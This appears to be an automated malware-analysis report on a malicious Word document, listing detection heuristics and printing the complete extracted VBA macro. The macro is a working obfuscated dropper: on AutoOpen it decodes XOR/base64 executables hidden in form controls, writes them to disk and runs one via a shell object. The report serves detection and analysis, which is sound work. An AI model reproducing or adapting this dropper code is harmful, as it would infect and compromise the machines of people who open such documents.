Verdict: MALICIOUS (risk score 398)

Heuristics (13)
- ClamAV: Ole2.Macro.Agent-9858864-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Ole2.Macro.Agent-9858864-1.
- VBA macros detected (medium, OLE_VBA_MACROS; 6 related findings): Document contains VBA macro code.
- Embedded PE decoded from VBA/UserForm payload string (critical, OLE_VBA_EMBEDDED_PE_DROPPER): The VBA macro carries a Windows executable encoded as a base64 or hex string, split across macro string literals or stored in a UserForm control's text (e.g. TextBox1.Text), and rebuilds it at run time, typically writing it to %ProgramData%/%TEMP% (ADODB.Stream / binary Put) and executing it via WScript.Shell or cmd.exe. The payload is embedded in the document, not downloaded, and never appears as a contiguous executable on disk, so the URL recoverers and the raw embedded-EXE scan miss it. The analyzer decoded it into a valid PE (MZ + DOS stub + PE header); a benign document does not carry an executable in its macro/form strings. The dropped payload has been carved for full extracted-file analysis.
- CreateObject call (high, OLE_VBA_CREATEOBJ): matched line in script: `Set wsh = CreateObject(xibasbd)`
- CallByName call (high, OLE_VBA_CALLBYNAME): matched line in script: `result(0) = CallByName(UserForm1.Controls(vnsadf), tyvdf, VbGet)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): matched line in script: `Sub AutoOpen()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): matched line in script: `GetstoragePath = Environ(sbcba)`
- Heap-spray pattern detected (high, SC_HEAP_SPRAY): Repeated 0x41 (A) bytes found. Disassembly hidden: these bytes score as degenerate, not coherent x86 code (the single mnemonic 'inc' is 100% of instructions; a sled or padding/filler run, not program logic).
- Password-protected archive handoff (high, SE_PASSWORD_ARCHIVE_LURE): Document gives password instructions for an archive or attachment, often used to keep payloads encrypted until after gateway scanning.
- NOP-equivalent sled detected (medium, SC_NOP_EQUIV_SLED): Long run of 0x41 bytes. Disassembly hidden: these bytes score as data, not coherent x86 code (5/10 branch targets land on an instruction boundary, 50% coherence).
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL extracted from this sample is labelled "In document text (OLE body)", i.e. none was reached via the macro channel.
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11179 bytes | e21238ca4bf1b1f10c74f57a4b58f3ae46269d479c61065a8ea0a0c57455dc84 |

Preview of macros.bas (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public keyHex As String
Sub xvqkblk(cvacjgzddhi As String)
Dim wsh As Object
xibasbd = livbwfa("FDI" + _
"BFA" + _
"sZF" + _
"V" + _
"0a" + _
"HhA" + _
"VL" + _
"w=" + _
"=")
Set wsh = CreateObject(xibasbd)
wsh.Run GetQuoteStart() & GetC(cvacjgzddhi) & GetQuoteStart(), GetWindowStyle(), False
End Sub
Function GetQuoteStart() As String
GetQuoteStart = Chr(34)
End Function
Function GetC(cvacjgzddhi As String) As String
GetC = cvacjgzddhi
End Function
Function GetWindowStyle() As Integer
GetWindowStyle = CalculateStyleValue()
End Function
Function CalculateStyleValue() As Integer
CalculateStyleValue = SubtractValues(10, 5)
End Function
Function SubtractValues(a As Integer, b As Integer) As Integer
SubtractValues = a - b
End Function
Function fileExist(filePath)
Dim fso
asbabc = livbwfa("EAI" + _
"QD" + _
"xIdC" + _
"B" + _
"0" + _
"OW" + _
"DMQL" + _
"w" + _
"Q" + _
"xH" + _
"xEd" + _
"BB4m" + _
"FB" + _
"8" + _
"c" + _
"IBU=")
Set fso = CreateObject(asbabc)
If fso.fileExists(filePath) Then
fileExist = True
Else
fileExist = False
End If
Set fso = Nothing
End Function
Private Function dfsadg(s As String) As String
On Error Resume Next
dfsadg = Replace(Replace(Replace(Replace(s, " ", ""), vbCr, ""), vbLf, ""), vbCrLf, "")
End Function
Private Sub iu8nvsd(ByRef m() As Integer)
Dim i As Integer
For i = 0 To 128
m(i) = -1
Next i
For i = 65 To 90: m(i) = (i - 65) Xor 0: Next i
For i = 97 To 122: m(i) = (i - 71) Xor 0: Next i
For i = 48 To 57: m(i) = (i + 4) Xor 0: Next i
m(43) = 62 Xor 0
m(47) = 63 Xor 0
m(61) = 0 Xor 0
End Sub
Private Function miomfig(ByVal v1 As Long, ByVal v2 As Long, ByVal v3 As Long, ByVal v4 As Long) As Long
miomfig = v1 * CLng(262144) + v2 * CLng(4096) + v3 * CLng(64) + v4
End Function
Private Sub jsuidnguinsdg(ByVal combined As Long, ByRef outArr() As Byte, ByVal pos As Long)
outArr(pos) = CByte((combined And &HFF0000) \ &H10000)
outArr(pos + 1) = CByte((combined And &HFF00&) \ &H100&)
outArr(pos + 2) = CByte(combined And &HFF&)
End Sub
Public Function hbvaf(ByVal cleanData As String) As Byte()
Dim mapArr(128) As Integer
Dim chkLen As Long, padCount As Integer
Dim idx As Long, pos As Long, outLen As Long
Dim resBytes() As Byte
Dim c1 As Integer, c2 As Integer, c3 As Integer, c4 As Integer
Dim combined As Long
chkLen = Len(cleanData) And 3
If chkLen <> 0 Then
hbvaf = ""
Exit Function
End If
padCount = 0
If (Len(cleanData) >= 2) And (Right$(cleanData, 2) = "==") Then
padCount = 2
ElseIf (Len(cleanData) >= 1) And (Right$(cleanData, 1) = "=") Then
padCount = 1
End If
iu8nvsd mapArr
outLen = (Len(cleanData) \ 4) * 3
If outLen > 0 Then
ReDim resBytes(outLen - 1)
Else
hbvaf = ""
Exit Function
End If
pos = 0
For idx = 1 To Len(cleanData) Step 4
c1 = mapArr(Asc(Mid$(cleanData, idx, 1)))
If c1 = -1 Then c1 = 0
c2 = mapArr(Asc(Mid$(cleanData, idx + 1, 1)))
If c2 = -1 Then c2 = 0
c3 = mapArr(Asc(Mid$(cleanData, idx + 2, 1)))
If c3 = -1 Then c3 = 0
c4 = mapArr(Asc(Mid$(cleanData, idx + 3, 1)))
If c4 = -1 Then c4 = 0
combined = miomfig(c1, c2, c3, c4)
Call jsuidnguinsdg(combined, resBytes, pos)
pos = pos + 3
Next idx
If padCount > 0 Then
ReDim Preserve resBytes(UBound(resBytes) - padCount)
End If
hbvaf = resBytes
End Function
Function chstd(s As String) As Byte()
Dim raw As String
raw = dfsadg(s)
chstd = hbvaf(raw)
End Function
Private Function livbwfa(ByVal encodedStr As String, Optional ByVal code As Integer = 2) As Variant
Dim decodedBytes() As Byte
Dim keyBytes() As Byte
Dim resultBytes() As Byte
Dim i As Long
Dim keyLen As Long
Dim dataLen As Long
Dim hexByte As String
decodedBytes = chstd(encodedStr)
If UBound(decodedBytes) = -1 Then
livbwfa = ""
Exit Function
End If
dataLen = UBound(decodedBytes) + 1
keyLen = Len(keyHex) / 2
If keyLen <= 0 Then
livbwfa = ""
Exit Function
End If
ReDim keyBytes(0 To keyLen - 1)
For i = 0 To keyLen - 1
hexByte = Mid(keyHex, i * 2 + 1, 2)
If Len(hexByte) <> 2 Then
livbwfa = ""
Exit Function
End If
keyBytes(i) = CByte("&H" & hexByte)
Next i
ReDim resultBytes(0 To dataLen - 1)
For i = 0 To dataLen - 1
resultBytes(i) = decodedBytes(i) Xor keyBytes(i Mod keyLen)
Next i
If code = 1 Then
livbwfa = resultBytes
Else
livbwfa = StrConv(resultBytes, vbUnicode)
End If
End Function
Private Function kabsd(buf As Variant) As Byte()
Dim i As Long
Dim tmp() As Byte
If VarType(buf) <> vbArray + vbByte Then
kabsd = Split("")
Exit Function
End If
ReDim tmp(LBound(buf) To UBound(buf))
For i = LBound(buf) To UBound(buf)
tmp(i) = buf(i)
Next i
kabsd = tmp
End Function
Private Function WBTD(FileName As String, staticBuf() As Byte) As Boolean
Dim fileNum As Integer
Dim i As Long
On Error GoTo ErrHandler
fileNum = FreeFile
Open FileName For Binary As #fileNum
For i = LBound(staticBuf) To UBound(staticBuf)
Put #fileNum, , staticBuf(i)
Next i
Close #fileNum
WBTD = True
Exit Function
ErrHandler:
WBTD = False
End Function
Function WrtBnfile(FileName As String, buf As Variant) As Boolean
Dim staticBuf() As Byte
staticBuf = kabsd(buf)
On Error Resume Next
If UBound(staticBuf) < LBound(staticBuf) Then
WrtBnfile = False
Exit Function
End If
On Error GoTo 0
WrtBnfile = WBTD(FileName, staticBuf)
End Function
Function vzexuqlaqfmxnd(path As String, conte As String)
hwminiArra = livbwfa(conte, 1)
WrtBnfile path, hwminiArra
End Function
Function GetstoragePath() As String
sbcba = livbwfa("FwQ" + _
"PF" + _
"g==")
GetstoragePath = Environ(sbcba)
Debug.Print GetstoragePath
End Function
Function BuildDP1(hfdsfasd As String) As String
asnca = livbwfa("Jg" + _
"M" + _
"NCQ" + _
"lEBB" + _
"cAAl" + _
"s" + _
"cOw" + _
"Q" + _
"=")
BuildDP1 = hfdsfasd & "\" & asnca
End Function
Function BuildDP2(hfdsfasd As String) As String
sdvv = livbwfa("ACA" + _
"O" + _
"D" + _
"wA" + _
"b" + _
"BF" + _
"4lNw" + _
"AXI" + _
"AkHF" + _
"Ew" + _
"N" + _
"DR8" + _
"=")
BuildDP2 = hfdsfasd & "\" & sdvv
End Function
Function BuildDP3(hfdsfasd As String) As String
ubv = livbwfa("J" + _
"gU" + _
"LE" + _
"lBH" + _
"CR" + _
"8Z")
BuildDP3 = hfdsfasd & "\" & ubv
End Function
Function GetFormContent() As String()
Dim result(2) As String
vnsadf = livbwfa("AA4" + _
"PCw" + _
"MH" + _
"BTEc" + _
"AgE" + _
"W" + _
"L" + _
"VA" + _
"=")
tyvdf = livbwfa("A" + _
"A" + _
"ASE" + _
"g" + _
"sGD" + _
"w" + _
"==")
result(0) = CallByName(UserForm1.Controls(vnsadf), tyvdf, VbGet)
result(1) = CallByName(UserForm2.Controls(vnsadf), tyvdf, VbGet)
result(2) = CallByName(UserForm3.Controls(vnsadf), tyvdf, VbGet)
GetFormContent = result
End Function
Sub ypoc(destPath1 As String, destPath2 As String, destPath3 As String, content() As String)
vzexuqlaqfmxnd destPath1, content(0)
vzexuqlaqfmxnd destPath2, content(1)
vzexuqlaqfmxnd destPath3, content(2)
End Sub
Sub checkrun(njivnbd As String)
xvqkblk (njivnbd)
End Sub
Sub gdsfa(ByRef f1 As String, ByRef f2 As String, ByRef f3 As String)
Dim baseDir As String
baseDir = GetstoragePath()
f1 = BuildDP1(baseDir)
f2 = BuildDP2(baseDir)
f3 = BuildDP3(baseDir)
Call MaterializeAssets(f1, f2, f3)
End Sub
Sub MaterializeAssets(inPath1 As String, inPath2 As String, inPath3 As String)
If Not fileExist(inPath1) Then
Dim byteData() As String
byteData = GetFormContent()
ypoc inPath1, inPath2, inPath3, byteData
Call asdfuib(inPath1)
End If
End Sub
Sub asdfuib(targetPath As String)
checkrun targetPath
End Sub
Function start()
Dim f1 As String, f2 As String, f3 As String
Call gdsfa(f1, f2, f3)
End Function
Function getkey()
Dim result As String
result = CallByName(UserForm4.Controls("C" + _
"om" + _
"ma" + _
"n" + _
"d" + _
"But" + _
"t" + _
"on1"), "Ca" + _
"pt" + _
"i" + _
"on", VbGet)
keyHex = result
start
End Function
Sub AutoOpen()
getkey
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{F1ED3889-86B5-470F-9859-3C27AD0D1514}{7DE4DEB2-3FA3-431F-995F-2ED81D540BB6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{99C5A5DC-90E1-4045-9160-28D8B470F311}{5385B164-4714-4B64-AADC-6C8D5F1BD1C3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
End Sub
Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{AA0A31B0-C9C0-462C-A5A9-94A9026DC0F7}{E09AC3CE-07D3-47F7-8EB6-C3BFDC4DE0E7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
End Sub
Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{CE69E5C1-2A70-4CF3-968F-24B86ED6C986}{AB11C1FD-B92A-4FCF-89BC-2792D206DB1A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vba_embedded_payload.bin | vba-embedded-pe | decoded from a hex/base64 payload string in a VBA UserForm control or macro literal | 96368 bytes | 2459fafef92fba15db51222e6b94e9853b7eff3256a54be22736e41b587a1b1f |